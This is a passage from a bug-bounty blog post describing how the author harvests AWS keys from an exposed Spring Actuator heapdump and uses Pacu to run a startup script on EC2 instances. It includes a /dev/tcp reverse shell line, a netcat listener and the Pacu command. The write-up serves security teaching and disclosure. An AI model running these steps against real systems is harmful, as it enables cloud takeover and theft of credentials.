</pre></table></code></div></div><hr /><p>And we got access to, env, heapdump, and others. At this point this is already a critical issue.</p><p>Here is a resume of what I found -&gt;</p><ul><li>AWS Keys<li>Postgresql Database user and password<li>Environment variables<li>Internal server information<li>Metrics<li>Thread information<li>Classes and information about the code of the application<li>Stack trace<li>jwt leaking information<li>Configuration environment</ul><h2 id="actuator-env-endpoint">Actuator /env endpoint</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/actuatorenv.png" /></p><p>One of the most interesting parts of the Actuator to analyze is the <code class="language-plaintext highlighter-rouge">heapdump</code>. It contains <code class="language-plaintext highlighter-rouge">memory data</code>, which often includes <code class="language-plaintext highlighter-rouge">sensitive information</code> such as <code class="language-plaintext highlighter-rouge">AWS keys</code>. This makes the heapdump the most <code class="language-plaintext highlighter-rouge">valuable resource</code> for attackers like us.</p><p>Using <a href="https://visualvm.github.io/">VisualVM</a>, we can open HeapDump and read the data. It is also possible to use strings, but visualVM is better.</p><p>Open VisualVM, go to Load, and select the heapdump file. It should look like this -&gt;</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/loadheapdump.png" /></p><p>Ok, heapdump loaded. We have java.lang.String, and chars[], that are the interesting parts.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/homepageheapdump.png" /></p><p>The first most important thing is to look if there are keys or anything related to the cloud, so I go directly to the <code class="language-plaintext highlighter-rouge">AWS keys</code> to see if I can find anything. Usually <code class="language-plaintext highlighter-rouge">AWS keys or cloud information</code> are contained in <code class="language-plaintext highlighter-rouge">java.lang.String</code>, but in this case, I found them in chars[].</p><p>Double click at char[] and it will open the tab.</p><p><code class="language-plaintext highlighter-rouge">And B00m!!</code> Here is our AWS Keys. I just needed to verify the key that had been generated with the valid time so that I could use it</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/awskeys.png" /></p><p>Now, export the keys in terminal and use <code class="language-plaintext highlighter-rouge">aws-cli</code>, or use <code class="language-plaintext highlighter-rouge">pacu</code>. I choose pacu to be faster.</p><h2 id="exploiting-aws-with-exported-keys">Exploiting AWS with exported keys</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/pacu.png" /></p><p>To know how to use pacu, access <a href="https://cybr.com/cloud-security/intro-to-aws-pentesting-with-pacu/">How to use Pacu</a></p><hr /><p>Set keys in pacu</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/setkeyspacu.png" /></p><p>After setting the keys, I went straight to the enumeration of AWS <code class="language-plaintext highlighter-rouge">ec2 instances</code> ( ec2__enum in pacu ), since if we can call the <code class="language-plaintext highlighter-rouge">startup method</code> we could get <code class="language-plaintext highlighter-rouge">RCE</code> in <code class="language-plaintext highlighter-rouge">every instance</code> on the AWS.</p><h4 id="steps">Steps</h4><p>To get Reverse Shell, I used my VPS.</p><ol><li>Create a file named shell.sh with the reverse shell code<li>Use something to receive the shell, in my case VPS<li>Call startup method with Pacu <code class="language-plaintext highlighter-rouge">run ec2__startup_shell_script</code>. For more information access this awesome article from rzepsky <a href="https://rzepsky.medium.com/playing-with-cloudgoat-part-5-hacking-aws-with-pacu-6abe1cf5780d">Exploiting AWS with Pacu</a><li>B00m! Receive Shell</ol><p><code class="language-plaintext highlighter-rouge">shell.sh</code> -&gt;</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>sh <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/IP/PORT 0&gt;&amp;1
</pre></table></code></div></div><p>VPS with netcat:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nc <span class="nt">-lnvp</span> 9001
</pre></table></code></div></div><p>Running ec2 startup shell script in Pacu terminal</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>run ec2__startup_shell_script --script shell.sh --instance-ids instanceid@region
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/startup.png" /></p><h3 id="gg-we-g0t-rce">GG We G0t RCE</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/shell.png" /></p><h1 id="thank-you-">Thank you !</h1><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/end.png" /></p><h1 id="report-status">Report Status</h1><blockquote><p>Reported at - March 25, 2024, 5:20pm UTC</p></blockquote><blockquote><p>Triaged at - March 25, 2024, 8:43pm UTC</p></blockquote><blockquote><p>Payed at - March 27, 2024, 6:18pm UTC</p></blockquote><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/payed.png" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/bugbounty/'>bugbounty</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/bugbounty/" class="post-tag no-text-decoration" >bugbounty</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=How I g0t 4000$ for AWS Metadata Leak and Takeover $$ - Ferreiraklet&url=http://localhost:4000/posts/4000BountyAws/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=How I g0t 4000$ for AWS Metadata Leak and Takeover $$ - Ferreiraklet&u=http://localhost:4000/posts/4000BountyAws/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=How I g0t 4000$ for AWS Metadata Leak and Takeover $$ - Ferreiraklet&url=http://localhost:4000/posts/4000BountyAws/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/ReconWideScope/"><div class="card-body"> <span class="timeago small" > Apr 20 <i class="unloaded">2024-04-20T11:13:13+00:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>ASN Recon | Recon wide scope targets</h3><div class="text-muted small"><p> Coming Soon :)</p></div></div></a></div><div class="card"> <a href="/posts/SQLInjection/"><div class="card-body"> <span class="timeago small" > Jun 3 <i class="unloaded">2024-06-03T11:13:13+00:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>The exploitation of a $$$$ SQL Injection Path Based</h3><div class="text-muted small"><p> Here is how I exploited a unusual SQL Injection Path Based and got rewarded with bounty First of all, here are some sections that will be covered in this article, 1 2 3 4 5 6 7 ┌───────────────Su...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/ReconWideScope/" class="btn btn-outline-primary"><p>ASN Recon | Recon wide scope targets</p></a> <a href="/posts/SQLInjection/" class="btn btn-outline-primary"><p>The exploitation of a $$$$ SQL Injection Path Based</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2024 <a href="https://twitter.com/ferreiraklet">ferreiraklet</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span> <script src="https://www.hackthebox.com/badge/945147"></script></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/bugbounty/">bugbounty</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://localhost:4000{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
